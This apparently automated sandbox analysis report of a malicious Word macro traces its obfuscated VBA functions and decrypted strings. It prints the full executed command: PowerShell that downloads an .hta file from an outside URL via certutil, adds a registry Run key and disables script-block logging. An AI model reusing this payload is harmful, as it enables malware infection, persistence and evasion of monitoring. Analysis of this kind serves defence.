185	JnhhTKXdDMF = "VPPF" & "\x9d\x2020\x201ac" & "\x2013\x0192\x0178P" & "Dn\x201ag" & "\x201ap\x2030\x2013" & "jD\x7f]" & "Ol\x2018k" & "\x90}ej\x0192" & "\x201d}\x7f\x7fJ" & "\x20acHBF\x9d\x201d" & "\x0178BF\x9d\x2020\x0192\x201a" & "v\x0192\x0178B" & "JF\x9d\x2039\x201ax" & "\x0178MF\x9d\x8d\x0178KK" & sfiSFQuRDPlM("809e504a449d529f9d") & "S\x0178DO" & sfiSFQuRDPlM("88496b67494e497a49") & "KHHBu\x2021\x2013BBBtd" & "j_\x2021e\x0160" & "qBB\x2039\x2021zBJ\x2030" & sfiSFQuRDPlM("658b426770985c75768b") & "KPxcnw\x2021" & "B\x20ac\x017eB\x2019qy\x2021t\x2022\x0160\x2021\x017d\x017dB" & "O\x90\x2018pk\x90\x2013\x2021\x201d\x0192eBO\x2021\x0161B\x201e" & "\x203arcu\x2022BBOp\x2018\x2019t\x2018\x02c6k\x017dgBBOpqg\x0161"
187	rMOBquizQidfuY4 = sfiSFQuRDPlM("6d959570839187") & sfiSFQuRDPlM("838f8f9386906a6b") & ""
188	sTNVQqU = "\x2020\x0152\x2030\|\|\x203a\x8d\x0161\x201e\x2122p\x2020" & sfiSFQuRDPlM("918792758c6b9b8a668f92858c6f91907b736b6a8b78927b84")
189	rMOBquizQidfuY4 = "k\x2026\x2013g\x2013\|e\|z\x8d\x017d" & "\x2020\x2122\x0152t"
190	sTNVQqU = zLcoKRaYmjuuyzJFwvb & GCWiglwNCH & KrunKQYb & GDjgDLPOpTOH & DAsxVsHQJ & gwxEIxlJXcH & hICkWL & thaycyR & qbvQHsuOUgPR & vaWnApNUERVVdUevRMo & QnTcsgLLYY & nmsYxXkvZCrJZXc & OpHnpOXn & FKqOztxLLjavwwStRF & ubpLU & JnhhTKXdDMF & rVgmmXcuFt
191	sTNVQqU = czeoPYDHuXBP(sTNVQqU)
192	lFqpVWxqJDWI = sTNVQqU
193	End Function

Subroutine MultiPage1_Layout, APIs: 13, Strings: 2, Number of lines: 15, Relevance: 34.015

APIs	Meta Information
Select
Delete
wdCharacter
Part of subcall function wZPQWBVG@ThisDocument: WholeStory
Part of subcall function wZPQWBVG@ThisDocument: Font
Part of subcall function wZPQWBVG@ThisDocument: Select
Part of subcall function MqDmFnN@ThisDocument: Delete
CreateObject	CreateObject("Wscript.Shell")
Part of subcall function czeoPYDHuXBP@ThisDocument: Len
Part of subcall function czeoPYDHuXBP@ThisDocument: Chr
Part of subcall function czeoPYDHuXBP@ThisDocument: Asc
Part of subcall function czeoPYDHuXBP@ThisDocument: Mid
Part of subcall function ETlScgoBRhHyaCajTIq@ThisDocument: Run

Strings	Decrypted Strings
"y\x2022\x2026\x201d\x2039\x2019\x2013P""u\x0160\x2021\x017d\x017d"
"data1"

Line	Instruction	Meta Information
123	Sub MultiPage1_Layout(ByVal Index as Long)
124	Dim rMOBquizQidfuY as String	executed
125	Dim kvSXzSPBAoLVF as Object
126	Dim ElfIvcAo as Integer
127	Dim JGavpCVwzOc as String
128	MultiPage1.Select	Select
129	Selection.Delete Unit := wdCharacter, Count := 1	Delete wdCharacter
130	wZPQWBVG
131	MqDmFnN
132	ElfIvcAo = 1635
133	rMOBquizQidfuY = "y\x2022\x2026\x201d\x2039\x2019\x2013P" & "u\x0160\x2021\x017d\x017d"
134	Set kvSXzSPBAoLVF = CreateObject(czeoPYDHuXBP(rMOBquizQidfuY))	CreateObject("Wscript.Shell") executed
135	JGavpCVwzOc = rrTmWOsw("data1")
136	JGavpCVwzOc = ETlScgoBRhHyaCajTIq(kvSXzSPBAoLVF, JGavpCVwzOc, ElfIvcAo)
137	End Sub

Function ETlScgoBRhHyaCajTIq, APIs: 5, Strings: 1, Number of lines: 16, Relevance: 22.016

APIs	Meta Information
Run	IWshShell3.Run("C:\WinDoWS\sysTEm32\CMD.EXe /c "SeT STI= $iBHrW = [tyPE]("{2}{7}{8}{3}{0}{5}{1}{6}{4}"-f 'ERi','RING,s','COLLE','En','.obJECT','c.DiCtiONARy[st','yStEM','c','tIoNs.g'); .("{0}{1}{2}"-f'S','ET','-iTEM') ("{0}{2}{1}" -f 'VAr','Le:7B1M','iAB') ([tYPe]("{2}{3}{1}{0}" -f'Ock','l','s','crIptb') ) ; $MZS=[tYPE]("{0}{1}"-F 'R','EF') ; ^&("{1}{2}{0}"-f '-iTEM','SE','T') ("{1}{0}{2}"-f'iAbL','vAr','e:04k') ( [tyPe]("{4}{3}{0}{1}{5}{2}"-f '.seRvICEp','o','AnAGeR','.nET','SySTeM','IntM')) ; $Nva1I = [tyPe]("{0}{1}{6}{4}{2}{5}{3}"-F'SY','StE','t.WE','ueST','.ne','BrEQ','m'); .("{2}{0}{1}" -f'E','M','seT-iT') ("V"+"Ar"+"Ia"+"Ble:kmd") ( [tYPe]("{6}{3}{4}{5}{0}{2}{1}"-F'nTIalcA','HE','c','ste','M.n','eT.CRede','sY')) ; $bqvM = [TypE]("{2}{0}{4}{1}{5}{3}"-F'TE','c','syS','ING','m.tExT.en','Od') ;[string[]] ${P`Ath} = .("{2}{3}{0}{1}" -f 'hi','ldItem','Get-','C') -Recurse -LiteralPath "$env:USERPROFILE\\AppData\\Local\\Microsoft" -ErrorAction ("{1}{4}{0}{3}{2}"-f'tlyC','Sile','ntinue','o','n') ^\| .("{0}{1}{2}{3}"-f'W','her','e-Obje','ct') -FilterScript {(${_}."MO`De"[0] -eq "d")} ^\| ^&('%') {${_}."F`UllnA`Me"}; do {${R} = ^&("{1}{0}{2}"-f 'Ran','Get-','dom') ${P`ATH}} While ((.("{0}{2}{1}" -f'Te','ath','st-P') ${R}) -and (${r}.("{1}{0}{2}"-f'owe','ToL','r').Invoke()).("{1}{0}{2}"-f 'in','Conta','s').Invoke(("{1}{0}"-f'emp','t')) -and (${r}.("{0}{1}{2}"-f'T','oL','ower').Invoke()).("{1}{0}"-f 's','Contain').Invoke("tmp") -and (${R}.("{0}{1}"-f'ToLow','er').Invoke()).("{2}{1}{0}" -f'ns','tai','Con').Invoke(("{1}{0}" -f'ache','c'))); ${s`AVE`path} = ${R}; ${Fu`Rl}=("{5}{0}{2}{6}{7}{8}{3}{4}{1}" -f'ps:','t','//mysen','ccess.log.t','x','htt','t.o','r','g/a'); ${sc`hP`AtH}=${sA`V`ep`AtH}+((("{3}{0}{1}{2}" -f'Cl','ibsy','s.hta','IT'))-replACE ([cHaR]73+[cHaR]84+[cHaR]67),[cHaR]92);.((("{1}{7}{3}{5}{6}{2}{9}{8}{0}{4}" -f 'x','C:fB9Window','m32fB9certutil','B9S','e','y','ste','sf','e','.'))-cRePLAcE 'fB9',[ChAr]92) -urlcache -split -f ${F`Url} ${s`chPa`Th} ^\| .("{0}{2}{1}" -f 'Out-','ull','N');.("{0}{1}{2}{3}" -f 'Se','t-','ItemProper','ty') -Path ((("{0}{12}{6}{10}{9}{8}{5}{4}{2}{3}{1}{7}{11}{14}{13}" -f 'HKC','ntV','pCur','re','owsTZ','rosoftTZpWind',':TZ','ers','pMic','eTZ','pSoftwar','ion','U','Run','TZp')).("{0}{1}" -f'REpl','ace').Invoke('TZp','\')) -Value ${sC`hp`ATh} -Name ("{1}{3}{0}{2}{4}" -f 'lightUpdat','Silw','eCo','er','reRun');${eRro`R`Ac`T`I`oNPrEF`ErEncE} = ("{3}{2}{4}{0}{1}" -f'nu','e','tlyCo','Silen','nti');IF(${pSVErS`iOn`T`ABLe}."p`sVE`RsIon"."m`AjoR" -Ge 3){${G`pF}= $MZs."AsSEmb`ly".("{2}{1}{0}" -f 'TYpe','t','GE').Invoke(("{1}{5}{3}{4}{2}{0}{6}"-f 'n.U','System.M','matio','nagemen','t.Auto','a','tils')).'GEtFie`lD'(("{1}{0}{4}{2}{5}{3}" -f'a','c','cyS','s','chedGroupPoli','etting'),'N'+("{3}{2}{1}{0}" -f'c','i','lic,Stat','onPub'));IF(${g`pf}){${G`pC}=${G`PF}.("{0}{1}{2}" -f 'GETVA','l','Ue').Invoke(${nU`lL});IF(${G`Pc}[("{0}{1}" -f'Scrip','tB')+("{2}{0}{1}{3}"-f 'gg','in','lockLo','g')]){${G`pc}[("{2}{0}{1}" -f 'ript','B','Sc')+("{2}{1}{0}{3}" -f 'kLogg','c','lo','ing')][("{3}{2}{0}{1}" -f'bleScri','ptB','a','En')+("{1}{0}{2}"-f 'og','lockL','ging')]=0;${g`pc}[("{0}{1}" -f 'Sc','riptB')+("{2}{3}{0}{1}"-f 'kLogg','ing','l','oc')][("{0}{4}{2}{5}{1}{6}{7}{3}" -f 'Ena','o','eSc','ging','bl','riptBlockInv','ca','tionLog')]=0}${v`Al}= (^&("{2}{1}{0}"-f 'ablE','ARi','V') ("I"+"BhRw")).ValuE::("{1}{0}"-f'ew','n').Invoke();${V`Al}.("{1}{0}" -f 'd','Ad').Invoke(("{2}{0}{1}"-f 'p','tB','EnableScri')+("{2}{1}{0}" -f'ng','i','lockLogg'),0);${v`AL}.("{1}{0}"-f 'DD','A').Invoke(("{3}{4}{6}{2}{8}{7}{5}{0}{1}{9}"-f 'n','L','riptB','Enab','leS','catio','c','o','lockInv','ogging'),0);${G`PC}[((("{16}{0}{1}{17}{12}{24}{4}{2}{3}{10}{23}{13}{21}{22}{9}{8}{14}{19}{5}{15}{11}{18}{7}{6}{25}{20}"-f 'Y_L','OCA','E8','k','HIN','D','8kD','kDPowerShell','ies8kD','c','DS','ws','_','ware8kDPo','Microsoft8','Windo','HKE','L','8','k','riptB','l','i','oft','MAC','Sc'))-REpLaCe ([chAR]56+[chAR]107+[chAR]68),[chAR]92)+("{2}{1}{0}" -f 'ckLogging','o','l')]=${V`AL}}ELSe{ (.("{1}{0}"-f'I','gc') ("{1}{0}{2}"-f 'i','VaR','aBLE:7b1,0,True) -> 259
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$

Strings	Decrypted Strings
"45546c53"

Line	Instruction	Meta Information
91	Function ETlScgoBRhHyaCajTIq(kHrLt as Object, ETlScgoBRhHyaCajTIq2 as String, XDQaMTq as Integer) as String
92	Dim HKfHjGpejTz as String	executed
93	Dim UMgTEGMeqcDZFMHaPEaI as String
94	HKfHjGpejTz = ETlScgoBRhHyaCajTIq2
95	UMgTEGMeqcDZFMHaPEaI = HKfHjGpejTz
96	Dim grMOBquizQidfuY6 as Integer
97	Dim gCtsDfR as Integer
98	grMOBquizQidfuY6 = 3
99	gCtsDfR = grMOBquizQidfuY6 * 4
100	If grMOBquizQidfuY6 < gCtsDfR Then
101	XDQaMTq = dpIPCghTYIO(XDQaMTq, UMgTEGMeqcDZFMHaPEaI)
102	kHrLt.Run HKfHjGpejTz, XDQaMTq, True	IWshShell3.Run("C:\WinDoWS\sysTEm32\CMD.EXe /c "SeT STI= $iBHrW = [tyPE]("{2}{7}{8}{3}{0}{5}{1}{6}{4}"-f 'ERi','RING,s','COLLE','En','.obJECT','c.DiCtiONARy[st','yStEM','c','tIoNs.g'); .("{0}{1}{2}"-f'S','ET','-iTEM') ("{0}{2}{1}" -f 'VAr','Le:7B1M','iAB') ([tYPe]("{2}{3}{1}{0}" -f'Ock','l','s','crIptb') ) ; $MZS=[tYPE]("{0}{1}"-F 'R','EF') ; ^&("{1}{2}{0}"-f '-iTEM','SE','T') ("{1}{0}{2}"-f'iAbL','vAr','e:04k') ( [tyPe]("{4}{3}{0}{1}{5}{2}"-f '.seRvICEp','o','AnAGeR','.nET','SySTeM','IntM')) ; $Nva1I = [tyPe]("{0}{1}{6}{4}{2}{5}{3}"-F'SY','StE','t.WE','ueST','.ne','BrEQ','m'); .("{2}{0}{1}" -f'E','M','seT-iT') ("V"+"Ar"+"Ia"+"Ble:kmd") ( [tYPe]("{6}{3}{4}{5}{0}{2}{1}"-F'nTIalcA','HE','c','ste','M.n','eT.CRede','sY')) ; $bqvM = [TypE]("{2}{0}{4}{1}{5}{3}"-F'TE','c','syS','ING','m.tExT.en','Od') ;[string[]] ${P`Ath} = .("{2}{3}{0}{1}" -f 'hi','ldItem','Get-','C') -Recurse -LiteralPath "$env:USERPROFILE\\AppData\\Local\\Microsoft" -ErrorAction ("{1}{4}{0}{3}{2}"-f'tlyC','Sile','ntinue','o','n') ^\| .("{0}{1}{2}{3}"-f'W','her','e-Obje','ct') -FilterScript {(${_}."MO`De"[0] -eq "d")} ^\| ^&('%') {${_}."F`UllnA`Me"}; do {${R} = ^&("{1}{0}{2}"-f 'Ran','Get-','dom') ${P`ATH}} While ((.("{0}{2}{1}" -f'Te','ath','st-P') ${R}) -and (${r}.("{1}{0}{2}"-f'owe','ToL','r').Invoke()).("{1}{0}{2}"-f 'in','Conta','s').Invoke(("{1}{0}"-f'emp','t')) -and (${r}.("{0}{1}{2}"-f'T','oL','ower').Invoke()).("{1}{0}"-f 's','Contain').Invoke("tmp") -and (${R}.("{0}{1}"-f'ToLow','er').Invoke()).("{2}{1}{0}" -f'ns','tai','Con').Invoke(("{1}{0}" -f'ache','c'))); ${s`AVE`path} = ${R}; ${Fu`Rl}=("{5}{0}{2}{6}{7}{8}{3}{4}{1}" -f'ps:','t','//mysen','ccess.log.t','x','htt','t.o','r','g/a'); ${sc`hP`AtH}=${sA`V`ep`AtH}+((("{3}{0}{1}{2}" -f'Cl','ibsy','s.hta','IT'))-replACE ([cHaR]73+[cHaR]84+[cHaR]67),[cHaR]92);.((("{1}{7}{3}{5}{6}{2}{9}{8}{0}{4}" -f 'x','C:fB9Window','m32fB9certutil','B9S','e','y','ste','sf','e','.'))-cRePLAcE 'fB9',[ChAr]92) -urlcache -split -f ${F`Url} ${s`chPa`Th} ^\| .("{0}{2}{1}" -f 'Out-','ull','N');.("{0}{1}{2}{3}" -f 'Se','t-','ItemProper','ty') -Path ((("{0}{12}{6}{10}{9}{8}{5}{4}{2}{3}{1}{7}{11}{14}{13}" -f 'HKC','ntV','pCur','re','owsTZ','rosoftTZpWind',':TZ','ers','pMic','eTZ','pSoftwar','ion','U','Run','TZp')).("{0}{1}" -f'REpl','ace').Invoke('TZp','\')) -Value ${sC`hp`ATh} -Name ("{1}{3}{0}{2}{4}" -f 'lightUpdat','Silw','eCo','er','reRun');${eRro`R`Ac`T`I`oNPrEF`ErEncE} = ("{3}{2}{4}{0}{1}" -f'nu','e','tlyCo','Silen','nti');IF(${pSVErS`iOn`T`ABLe}."p`sVE`RsIon"."m`AjoR" -Ge 3){${G`pF}= $MZs."AsSEmb`ly".("{2}{1}{0}" -f 'TYpe','t','GE').Invoke(("{1}{5}{3}{4}{2}{0}{6}"-f 'n.U','System.M','matio','nagemen','t.Auto','a','tils')).'GEtFie`lD'(("{1}{0}{4}{2}{5}{3}" -f'a','c','cyS','s','chedGroupPoli','etting'),'N'+("{3}{2}{1}{0}" -f'c','i','lic,Stat','onPub'));IF(${g`pf}){${G`pC}=${G`PF}.("{0}{1}{2}" -f 'GETVA','l','Ue').Invoke(${nU`lL});IF(${G`Pc}[("{0}{1}" -f'Scrip','tB')+("{2}{0}{1}{3}"-f 'gg','in','lockLo','g')]){${G`pc}[("{2}{0}{1}" -f 'ript','B','Sc')+("{2}{1}{0}{3}" -f 'kLogg','c','lo','ing')][("{3}{2}{0}{1}" -f'bleScri','ptB','a','En')+("{1}{0}{2}"-f 'og','lockL','ging')]=0;${g`pc}[("{0}{1}" -f 'Sc','riptB')+("{2}{3}{0}{1}"-f 'kLogg','ing','l','oc')][("{0}{4}{2}{5}{1}{6}{7}{3}" -f 'Ena','o','eSc','ging','bl','riptBlockInv','ca','tionLog')]=0}${v`Al}= (^&("{2}{1}{0}"-f 'ablE','ARi','V') ("I"+"BhRw")).ValuE::("{1}{0}"-f'ew','n').Invoke();${V`Al}.("{1}{0}" -f 'd','Ad').Invoke(("{2}{0}{1}"-f 'p','tB','EnableScri')+("{2}{1}{0}" -f'ng','i','lockLogg'),0);${v`AL}.("{1}{0}"-f 'DD','A').Invoke(("{3}{4}{6}{2}{8}{7}{5}{0}{1}{9}"-f 'n','L','riptB','Enab','leS','catio','c','o','lockInv','ogging'),0);${G`PC}[((("{16}{0}{1}{17}{12}{24}{4}{2}{3}{10}{23}{13}{21}{22}{9}{8}{14}{19}{5}{15}{11}{18}{7}{6}{25}{20}"-f 'Y_L','OCA','E8','k','HIN','D','8kD','kDPowerShell','ies8kD','c','DS','ws','_','ware8kDPo','Microsoft8','Windo','HKE','L','8','k','riptB','l','i','oft','MAC','Sc'))-REpLaCe ([chAR]56+[chAR]107+[chAR]68),[chAR]92)+("{2}{1}{0}" -f 'ckLogging','o','l')]=${V`AL}}ELSe{ (.("{1}{0}"-f'I','gc') ("{1}{0}{2}"-f 'i','VaR','aBLE:7b1,0,True) -> 259 executed
103	Endif
104	HKfHjGpejTz = sfiSFQuRDPlM("45546c53") & "cgoBR" & "hHyaC" & "ajTIq6"
105	ETlScgoBRhHyaCajTIq = HKfHjGpejTz
106	End Function

Function rrTmWOsw, APIs: 4, Strings: 1, Number of lines: 13, Relevance: 7.513

APIs	Meta Information
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$

Strings	Decrypted Strings
"l\x2013s\x2022\x02c6q""i\x0153\x2122ryw""\x2022\x0192z\x0161s\x02c6\x02c6""\x0160jmun\x2030\x201ddh""\x2021\x2018\x2020zn""\x201e{\x8foh"

Line	Instruction	Meta Information
56	Function rrTmWOsw(BbgpP as String)
57	Dim grMOBquizQidfuY2 as Integer	executed
58	Dim gMaHlNzuvxNfXVIk as Integer
59	grMOBquizQidfuY2 = 5378
60	gMaHlNzuvxNfXVIk = 4
61	If grMOBquizQidfuY2 < gMaHlNzuvxNfXVIk Then
62	BbgpP = BbgpP & "\x2022\x2022\x2019\x8f" & "z\x2030\x0192v" & "\x2021rlp" & "rtt\x2039\x201e\x2021jm\x2014" & sfiSFQuRDPlM("6e88788b7b716668877766") & sfiSFQuRDPlM("77757877")
63	rrTmWOsw = tfNaRhVGiNw(BbgpP) & lFqpVWxqJDWI(BbgpP)
64	Else
65	BbgpP = "l\x2013s\x2022\x02c6q" & "i\x0153\x2122ryw" & "\x2022\x0192z\x0161s\x02c6\x02c6" & "\x0160jmun\x2030\x201ddh" & "\x2021\x2018\x2020zn" & "\x201e{\x8foh"
66	rrTmWOsw = tfNaRhVGiNw(BbgpP) & lFqpVWxqJDWI(BbgpP)
67	Endif
68	End Function

Function czeoPYDHuXBP, APIs: 4, Strings: 0, Number of lines: 10, Relevance: 7.51

APIs	Meta Information
Len	Len("y\x2022\x2026\x201d\x2039\x2019\x2013Pu\x0160\x2021\x017d\x017d") -> 13 Len("e\~y\x2039\xfffdf\x2018yu~\x2022\x203a\x2022vg\xfffdUT~eofPgz\x2021BBQ\x2026BBBDu\x2021vBBuvk_BBBBF\x2039dj\x201dyB_BB}\x2013\x203arg\x7fJD\xfffdT\x0178\xfffdY\x0178\xfffdZ\x0178\xfffdU\x0178\xfffdR\x0178\xfffdW\x0178\xfffdS\x0178\xfffdX\x0178\xfffdV\x0178DO\x02c6BIgt\x2039INItkpiN\x2022INIeqnngINIg\xfffdINIP\x2018\x201elgevINI\x2026Pf\x2039e\x2013\x2039qpct\x203a}\x2022\x2013INI\x203au\x2013goINI\x2026INI\x2013k\x2018p\x2022P\x2030IK]BBBPJD\xfffdR\x0178\xfffdS\x0178\xfffdT\x0178DO\x02c6IuINIgvINIO\x2039vgoIKBJD\xfffdR\x0178\xfffdT\x0178\xfffdS\x0178DBO\x02c6BIxc\x201dINIn\x2021\YdSoINI\x2039cdIKBBJ}\x2013{r\x2021\x7fJD\xfffdT\x0178\xfffdU\x0178\xfffdS\x0178\xfffdR\x0178DBO\x02c6Iq\x2026\xfffdINI\x017dINI\x2022INI\x2026\x201dk\x2019\x2013\x201eIKBBKB]BBBFo\|u_}\x2013{rg\x7fJD\xfffdR\x0178\xfffdS\x0178DOhBItINIghIKB]BBBB\x20acHJD\xfffdS\x0178\xfffdT\x0178\xfffdR\x0178DO\x02c6BIO\x2039vgoINIugINIvIKBJD\xfffdS\x0178\xfffdR\x0178\xfffdT\x0178DO\x02c6I\x2039c\x201enINI\x02dcc\x201dINI\x2021\RV\xfffdIKBJBB}\x2013\x203ar\x2021\x7fJD\xfffdV\x0178\xfffdU\x0178\xfffdR\x0178\xfffdS\x0178\xfffdW\x0178\xfffdT\x0178DO\x02c6BIP\x2022\x2021t\x02dckeg\x2019INI\x2018INIc\xfffdci\x2021tINIP\xfffdgvINIu\x203auv\x2021oINIk\xfffd\x2013oIKKBB]BBFp\x02dc\x0192SkBB_B}\x2013\x203ar\x2021\x7fJD\xfffdR\x0178\xfffdS\x0178\xfffdX\x0178\xfffdV\x0178\xfffdT\x0178\xfffdW\x0178\xfffdU\x0178DOhIu{INIu\x2013gINI\x2013PygINI\x2014\x2021uvINIP\xfffd\x2021INId\x201dgsINI\xfffdIK]BPJD\xfffdT\x0178\xfffdR\x0178\xfffdS\x0178DBO\x02c6IgINIoINI\x2022\x2021vO\x2039vIKBBJDxDMDc\x201dDMDk\x0192DMDd\x017d\x2021\\xfffd\xfffd\x2020DKBBJB}\x2013{r\x2021\x7fJD\xfffdX\x0178\xfffdU\x0178\xfffdV\x0178\xfffdW\x0178\xfffdR\x0178\xfffdT\x0178\xfffdS\x0178DOhI\xfffdvk\x0192\x017d\x2026cINIjgINI\x2026INI\x2022\x2013\x2021INIoP\xfffdINI\x2021vPet\x2021\x2020\x2021INI\x2022{IKKB]BBBF\x201e\x201c\x02dcoB_B}v\x203a\x2019g\x7fJD\xfffdT\x0178\xfffdR\x0178\xfffdV\x0178\xfffdS\x0178\xfffdW\x0178\xfffdU\x0178DOhIvgINI\x2026INI\x2022\x203auINIkpiINI\xfffdP\x2013g\x0161vP\x2021\xfffdINIq\x2020IKB]}\x2022\x2013\x201d\x2039\xfffd\x2030}\x7f\x7fBF\xfffdr\x201ac\x2013\x0160\x0178B_BPJD\xfffdT\x0178\xfffdU\x0178\xfffdR\x0178\xfffdS\x0178DBO\x02c6BI\x0160\x2039INI\x017d\x2020k\x2013\x2021\xfffdINIi\x2021\x2013OINIeIKBOt\x2021\x2026\x2014\x201d\x2022\x2021BOn\x2039\x2013\x2021\x201d\x0192\x017dr\x0192\x2013\x0160BDF\x2021\xfffd\x02dc\wugtrtqhkng~~c\x2019\x2019f\x0192\x2013\x0192~~n\x2018\x2026\x0192\x017d~~o\x2039\x2026\x201d\x2018\x2022\x2018\x02c6\x2013DBOg\x201d\x201d\x2018\x201dc\x2026\x2013\x2039\x2018\xfffdBJD\xfffdS\x0178\xfffdV\x0178\xfffdR\x0178\xfffdU\x0178\xfffdT\x0178DO\x02c6I\x2013\x017d\x203aeINIu\x2039\x017d\x2021INI\xfffd\x2013\x2039\xfffd\x2014\x2021INI\x2018INI\xfffdIKB\x20ac\x017eBPJD\xfffdR\x0178\xfffdS\x0178\xfffdT\x0178\xfffdU\x0178DO\x02c6IyINI\x0160\x2021\x201dINI\x2021Oq\x201e\x0152\x2021INI\x2026\x2013IKBOh\x2039\x017d\x2013\x2021\x201du\x2026\x201d\x2039\x2019\x2013B\xfffdJF\xfffd\xfffd\x0178PDoq\x201af\x2021D}R\x7fBO\x2021\x201cBD\x2020DK\x0178B\x20ac\x017eB\x20acHJIGIKB\xfffdF\xfffd\xfffd\x0178PDh\x201aw\x017d\x017d\xfffdc\x201ao\x2021D\x0178]B\x2020\x2018B\xfffdF\xfffdt\x0178B_B\x20acHJD\xfffdS\x0178\xfffdR\x0178\xfffdT\x0178DO\x02c6BIt\x0192\xfffdINIi\x2021\x2013OINI\x2020\x2018\xfffdIKBF\xfffdr\x201acvj\x0178\x0178By\x0160\x2039\x017d\x2021BJJPJD\xfffdR\x0178\xfffdT\x0178\xfffdS\x0178DBO\x02c6Iv\x2021INI\x0192\x2013\x0160INI\x2022\x2013OrIKBF\xfffdt\x0178KBO\x0192\xfffd\x2020BJF\xfffd\x201d\x0178PJD\xfffdS\x0178\xfffdR\x0178\xfffdT\x0178DO\x02c6I\x2018\x2122\x2021INIv\x2018nINI\x201dIKPk\xfffd\x02dc\x2018\xfffd\x2021JKKPJD\xfffdS\x0178\xfffdR\x0178\xfffdT\x0178DO\x02c6BI\x2039\xfffdINIe\x2018\xfffd\x2013\x0192INI\x2022IKPk\xfffd\x02dc\x2018\xfffd\x2021JJD\xfffdS\x0178\xfffdR\x0178DO\x02c6I\x2021\xfffd\x2019INI\x2013IKKBO\x0192\xfffd\x2020BJF\xfffd\x201d\x0178PJD\xfffdR\x0178\xfffdS\x0178\xfffdT\x0178DO\x02c6IvINI\x2018nINI\x2018\x2122\x2021\x201dIKPk\xfffd\x02dc\x2018\xfffd\x2021JKKPJD\xfffdS\x0178\xfffdR\x0178DO\x02c6BI\x2022INIe\x2018\xfffd\x2013\x0192\x2039\xfffdIKPk\xfffd\x02dc\x2018\xfffd\x2021JD\x2013\xfffd\x2019DKBO\x0192\xfffd\x2020BJF\xfffdt\x0178PJD\xfffdR\x0178\xfffdS\x0178DO\x02c6Iv\x2018n\x2018\x2122INI\x2021\x201dIKPk\xfffd\x02dc\x2018\xfffd\x2021JKKPJD\xfffdT\x0178\xfffdS\x0178\xfffdR\x0178DBO\x02c6I\xfffd\x2022INI\x2013\x0192\x2039INIe\x2018\xfffdIKPk\xfffd\x02dc\x2018\xfffd\x2021JJD\xfffdS\x0178\xfffdR\x0178DBO\x02c6I\x0192\x2026\x0160\x2021INI\x2026IKKK]BF\xfffd\x2022\x201acxg\x201a\x2019\x0192\x2013\x0160\x0178B_BF\xfffdt\x0178]BF\xfffdh\x2014\x201at\x017d\x0178_JD\xfffdW\x0178\xfffdR\x0178\xfffdT\x0178\xfffdX\x0178\xfffdY\x0178\xfffdZ\x0178\xfffdU\x0178\xfffdV\x0178\xfffdS\x0178DBO\x02c6I\x2019\x2022\INI\x2013INIQQ\xfffd\x203a\x2022\x2021\xfffdINI\x2026\x2026\x2021\x2022\x2022P\x017d\x2018\x2030P\x2013INI\x0161INI\x0160\x2013\x2013INI\x2013P\x2018INI\x201dINI\x2030Q\x0192IK]BF\xfffd\x2022\x2026\x201a\x0160r\x201ac\x2013j\x0178_F\xfffd\x2022c\x201ax\x201a\x2021\x2019\x201ac\x2013j\x0178MJJJD\xfffdU\x0178\xfffdR\x0178\xfffdS\x0178\xfffdT\x0178DBO\x02c6Ie\x017dINI\x2039\x201e\x2022\x203aINI\x2022P\x0160\x2013\x0192INIkvIKKO\x201d\x2021\x2019\x017dcegBBJ}\x2026j\x0192t\x7fYUM}\x2026j\x0192t\x7fZVM}\x2026j\x0192t\x7fXYKN}\x2026j\x0192t\x7f[TK]PJJJD\xfffdS\x0178\xfffdY\x0178\xfffdU\x0178\xfffdW\x0178\xfffdX\x0178\xfffdT\x0178\xfffd[\x0178\xfffdZ\x0178\xfffdR\x0178\xfffdV\x0178DBO\x02c6BI\x0161INIe\\x02c6d[y\x2039\xfffd\x2020\x2018\x2122INI\xfffdUT\x02c6d[\x2026\x2021\x201d\x2013\x2014\x2013\x2039\x017dINId[uINI\x2021INI\x203aINI\x2022\x2013\x2021INI\x2022\x02c6INI\x2021INIPIKKO\x2026t\x2021rnc\x2026gBBI\x02c6d[IN}e\x0160c\x201d\x7f[TKBO\x2014\x201d\x017d\x2026\x0192\x2026\x0160\x2021BO\x2022\x2019\x017d\x2039\x2013BO\x02c6BF\xfffdh\x201aw\x201d\x017d\x0178BF\xfffd\x2022\x201a\x2026\x0160r\x0192\x201av\x0160\x0178B\x20ac\x017eBPJD\xfffdR\x0178\xfffdT\x0178\xfffdS\x0178DBO\x02c6BIq\x2014\x2013OINI\x2014\x017d\x017dINIpIK]PJD\xfffdR\x0178\xfffdS\x0178\xfffdT\x0178\xfffdU\x0178DBO\x02c6BIu\x2021INI\x2013OINIk\x2013\x2021\xfffdr\x201d\x2018\x2019\x2021\x201dINI\x2013\x203aIKBOr\x0192\x2013\x0160BJJJD\xfffdR\x0178\xfffdST\x0178\xfffdX\x0178\xfffdSR\x0178\xfffd[\x0178\xfffdZ\x0178\xfffdW\x0178\xfffdV\x0178\xfffdT\x0178\xfffdU\x0178\xfffdS\x0178\xfffdY\x0178\xfffdSS\x0178\xfffdSV\x0178\xfffdSU\x0178DBO\x02c6BIjmeINI\xfffd\x2013xINI\x2019e\x2014\x201dINI\x201d\x2021INI\x2018\x2122\x2022v\|INI\x201d\x2018\x2022\x2018\x02c6\x2013v\|\x2019y\x2039\xfffd\x2020INI\v\|INI\x2021\x201d\x2022INI\x2019o\x2039\x2026INI\x2021v\|INI\x2019u\x2018\x02c6\x2013\x2122\x0192\x201dINI\x2039\x2018\xfffdINIwINIt\x2014\xfffdINIv\|\x2019IKKPJD\xfffdR\x0178\xfffdS\x0178DBO\x02c6Itg\x2019\x017dINI\x0192\x2026\x2021IKPk\xfffd\x02dc\x2018\xfffd\x2021JIv\|\x2019INI~IKKBBOx\x0192\x017d\x2014\x2021BF\xfffd\x2022e\x201a\x0160\x2019\x201acv\x0160\x0178BOp\x0192\xfffd\x2021BJD\xfffdS\x0178\xfffdU\x0178\xfffdR\x0178\xfffdT\x0178\xfffdV\x0178DBO\x02c6BI\x017d\x2039\x2030\x0160\x2013w\x2019\x2020\x0192\x2013INIu\x2039\x017d\x2122INI\x2021e\x2018INI\x2021\x201dINI\x201d\x2021t\x2014\xfffdIK]F\xfffd\x2021t\x201d\x2018\x201at\x201ac\x